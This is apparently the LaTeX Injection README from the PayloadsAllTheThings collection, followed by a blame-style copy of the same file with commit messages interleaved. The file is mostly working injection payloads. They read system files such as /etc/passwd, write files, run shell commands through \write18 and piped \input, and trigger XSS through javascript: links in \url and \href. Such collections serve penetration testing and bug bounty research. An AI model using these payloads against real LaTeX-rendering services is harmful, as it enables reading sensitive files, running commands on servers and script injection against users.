PayloadsAllTheThings/LaTeX Injection/README.md

# LaTex Injection

## Read file

Read file and interpret the LaTeX code in it:

```tex
\input{/etc/passwd}
\include{somefile} # load .tex file (somefile.tex)
```

Read single lined file:

```tex
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```

Read multiple lined file:

```tex
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file
```

Read text file, **without** interpreting the content, it will only paste raw file content:

```tex
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```

If injection point is past document header (`\usepackage` cannot be used), some control 
characters can be deactivated in order to use `\input` on file containing `$`, `#`, 
`_`, `&`, null bytes, ... (eg. perl scripts).

```tex
\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12
\input{path_to_script.pl}
```

## Write file

Write single lined file:

```tex
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile
```

## Command execution

The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.

```tex
\immediate\write18{id > output}
\input{output}
```

If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):

```tex
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```

```tex
\input|ls|base64
\input{|"/bin/hostname"}
```

## Cross Site Scripting

From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) 

```tex
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```

Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$`

## References

* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`# LaTex Injection`

			`## Read file`
Markdown formatting update 2018-08-12 23:30:22 +02:00
Update README.md 2021-09-29 07:28:11 +02:00			`Read file and interpret the LaTeX code in it:`

			```tex
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\input{/etc/passwd}`
Update README.md 2021-09-29 07:28:11 +02:00			`\include{somefile} # load .tex file (somefile.tex)`
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			```

Update README.md 2021-09-29 07:28:11 +02:00			`Read single lined file:`
Markdown formatting update 2018-08-12 23:30:22 +02:00
Update README.md 2021-09-29 07:28:11 +02:00			```tex
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\newread\file`
			`\openin\file=/etc/issue`
			`\read\file to\line`
			`\text{\line}`
			`\closein\file`
			```

Update README.md 2021-09-29 07:28:11 +02:00			`Read multiple lined file:`
Markdown formatting update 2018-08-12 23:30:22 +02:00
Update README.md 2021-09-29 07:28:11 +02:00			```tex
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\newread\file`
			`\openin\file=/etc/passwd`
			`\loop\unless\ifeof\file`
Markdown formatting update 2018-08-12 23:30:22 +02:00			`\read\file to\fileline`
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\text{\fileline}`
			`\repeat`
			`\closein\file`
			```

Update README.md 2021-09-29 07:28:11 +02:00			`Read text file, without interpreting the content, it will only paste raw file content:`
Markdown formatting update 2018-08-12 23:30:22 +02:00
Update README.md 2021-09-29 07:28:11 +02:00			```tex
LaTeX display code + XSS location alternative 2018-08-01 21:19:18 +02:00			`\usepackage{verbatim}`
			`\verbatiminput{/etc/passwd}`
			```

LaTeX Injection catcode add `\catcode` to disable LaTex control characters 2022-02-22 15:57:04 +01:00			If injection point is past document header (`\usepackage` cannot be used), some control
			characters can be deactivated in order to use `\input` on file containing `$`, `#`,
			`_`, `&`, null bytes, ... (eg. perl scripts).

			```tex
			\catcode `\$=12
			\catcode `\#=12
			\catcode `\_=12
			\catcode `\&=12
			`\input{path_to_script.pl}`
			```

LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`## Write file`
Markdown formatting update 2018-08-12 23:30:22 +02:00
Update README.md 2021-09-29 07:28:11 +02:00			`Write single lined file:`

			```tex
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\newwrite\outfile`
			`\openout\outfile=cmd.tex`
			`\write\outfile{Hello-world}`
Update README.md 2021-09-29 07:28:11 +02:00			`\write\outfile{Line 2}`
			`\write\outfile{I like trains}`
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\closeout\outfile`
			```

			`## Command execution`
Markdown formatting update 2018-08-12 23:30:22 +02:00
Update README.md 2021-09-29 07:28:11 +02:00			`The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.`
Markdown formatting update 2018-08-12 23:30:22 +02:00
Update README.md 2021-09-29 07:28:11 +02:00			```tex
			`\immediate\write18{id > output}`
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\input{output}`
			```
Markdown formatting update 2018-08-12 23:30:22 +02:00
Update README.md 2021-09-29 07:28:11 +02:00			If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
Markdown formatting update 2018-08-12 23:30:22 +02:00
Update README.md 2021-09-29 07:28:11 +02:00			```tex
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`\immediate\write18{env \| base64 > test.tex}`
			`\input{text.tex}`
			```

Update README.md 2021-09-29 07:28:11 +02:00			```tex
			`\input\|ls\|base64`
LaTeX display code + XSS location alternative 2018-08-01 21:19:18 +02:00			`\input{\|"/bin/hostname"}`
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			```

Meterpreter generate + LaTeK XSS + Ruby Yaml 2019-03-03 16:31:17 +01:00			`## Cross Site Scripting`

			`From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)`
Update README.md 2021-09-29 07:28:11 +02:00
			```tex
Meterpreter generate + LaTeK XSS + Ruby Yaml 2019-03-03 16:31:17 +01:00			`\url{javascript:alert(1)}`
			`\href{javascript:alert(1)}{placeholder}`
			```

			Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$`

Adding references sectio 2018-12-24 15:02:50 +01:00			`## References`
Markdown formatting update 2018-08-12 23:30:22 +02:00
LaTeX injection + RCE bypass with backslash 2018-07-22 22:35:46 +02:00			`* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)`
			`* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)`
Update README.md 2021-09-29 07:28:11 +02:00			`* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)`